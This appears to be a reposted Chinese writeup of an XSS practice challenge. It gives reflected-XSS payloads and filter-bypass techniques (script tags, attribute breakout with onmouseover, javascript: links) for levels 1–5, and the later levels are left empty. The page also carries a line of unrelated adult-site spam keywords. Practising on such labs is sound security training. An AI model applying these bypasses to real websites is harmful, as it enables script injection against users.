日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XSS平台 XSS挑战之旅 解题记录 writeup

發布時間:2023/12/14 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XSS平台 XSS挑战之旅 解题记录 writeup 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

XSS平臺 XSS挑戰之旅 解題記錄 writeup

    • level1
    • level2
    • level3
    • level4
    • level5
    • level6
    • level7
    • level8
    • level9
    • level10
    • level11
    • level12
    • level13


XSS挑戰之旅是一個練習簡單XSS腳本注入的平臺,通過檢測彈窗判斷用戶是否通關。
但前幾關存在bug,只要在網頁源碼圖片鏈接處插入JavaScript代碼即可產生彈窗,達到通關的目的。
:Google Chrome存在過濾彈窗,用Firefox瀏覽器。

<center><img src="level.png"></center> //源碼 <center><img src=x onerror=alert(1)></center> //將其修改為這樣即可bug通關

詳盡的XSS跨站腳本攻擊請看:XSS跨站腳本攻擊原理與常見的腳本及《XSS跨站腳本攻擊剖析與防御》摘錄總結

level1


頁面中沒有輸入點,但發現通過地址欄傳入的參數‘name=test’會回顯在頁面,

http://test.xss.tv/level1.php?name=test

嘗試通過在URL中構造payload完成XSS攻擊:

http://test.xss.tv/level1.php?name=<script>alert(1);</script>

觸發彈窗,完成的不錯!通關。

level2


頁面存在輸入框,搜索的數據在頁面有回顯,在搜索框構造payload并提交:

<script>alert(1);</script>

返回的頁面并沒有觸發彈窗,查看網頁源代碼:

<h1 align=center>歡迎來到level2</h1> <h2 align=center>沒有找到和&lt;script&gt;alert(1);&lt;/script&gt;相關的結果.</h2><center> <form action=level2.php method=GET> <input name=keyword value="<script>alert(1);</script>">

發現在<h2>標簽中,‘<>’符號被轉譯,但在<input>標簽中‘value’的值完整顯示了輸入的payload,嘗試閉合value的值,在輸入框重新構造xss注入代碼:

"><script>alert(1);</script> //提交后源碼變為: <input name=keyword value=""><script>alert(1);</script>">

觸發彈窗,完成的不錯!通關。

level3


頁面存在輸入框,搜索的數據在頁面有回顯,在搜索框構造payload并提交:

<script>alert(1);</script>

返回的頁面并沒有觸發彈窗,查看網頁源代碼:

<h1 align=center>歡迎來到level3</h1> <h2 align=center>沒有找到和&lt;script&gt;alert(1);&lt;/script&gt;相關的結果.</h2><center> <form action=level3.php method=GET> <input name=keyword value='&lt;script&gt;alert(1);&lt;/script&gt;'>

發現在<h2>和<input>標簽中,‘<>’符號均被轉譯,嘗試搜索“<"/()’>”,在網頁源代碼查看符號被轉譯的情況,發現‘<">‘被編碼

<h2 align=center>沒有找到和&lt;&quot;/()'&gt;相關的結果.</h2><center> <form action=level3.php method=GET> <input name=keyword value='&lt;&quot;/()'&gt;'>

嘗試閉合‘value’的值,通過事件觸發彈窗,在輸入框構造新的payload:

' οnmοuseοver='alert(1) //提交后源碼變為: <input name=keyword value='' onmouseover='alert(1)'>

鼠標移到輸入框便觸發事件產生彈窗,完成的不錯!通關。

level4


頁面存在輸入框,搜索的數據在頁面有回顯,嘗試搜索“<"/()’>”,在網頁源代碼中查看符號被轉譯的情況,

<h1 align=center>歡迎來到level4</h1> <h2 align=center>沒有找到和&lt;&quot;/()'&gt;相關的結果.</h2><center> <form action=level4.php method=GET> <input name=keyword value=""/()'">

發現在<h2>標簽中,‘<">’被編碼,<input>標簽里‘value’中的’<>'被替換為空白,嘗試閉合‘value’的值,通過事件觸發彈窗,在輸入框構造新的payload:

" οnmοuseοver="alert(1) //提交后源碼變為: <input name=keyword value="" onmouseover="alert(1)">

鼠標移到輸入框便觸發事件產生彈窗,完成的不錯!通關。

level5


頁面存在輸入框,搜索的數據在頁面有回顯,嘗試搜索“<"/()’>”,在網頁源代碼中查看符號被轉譯的情況,

<h1 align=center>歡迎來到level5</h1> <h2 align=center>沒有找到和&lt;&quot;/()'&gt;相關的結果.</h2><center> <form action=level5.php method=GET> <input name=keyword value="<"/()'>">

搜索"onmouseover"和’<script>alert(1);</script>’,在網頁源代碼中查看符號被轉譯的情況,

<input name=keyword value="o_nmouseover"> <input name=keyword value="<scr_ipt>alert(1);</script>">

發現在<h2>標簽中,‘<">’被編碼,<input>標簽里‘value’中的‘onmouseover’被替換為‘o_nmouseover’,'script’被替換為scr_ipt,嘗試閉合‘value’的值,通過<a href=>標簽中的引用屬性,在輸入框構造新的payload:

"><a href="javascript:alert(1);">aaa</a> //提交后源碼變為: <input name=keyword value=""><a href="javascript:alert(1);">aaa</a>">


通過點擊aaa鏈接,觸發javascript腳本引用屬性產生彈窗,完成的不錯!通關。

level6

level7

level8

level9

level10

level11

level12

level13

總結

以上是生活随笔為你收集整理的XSS平台 XSS挑战之旅 解题记录 writeup的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。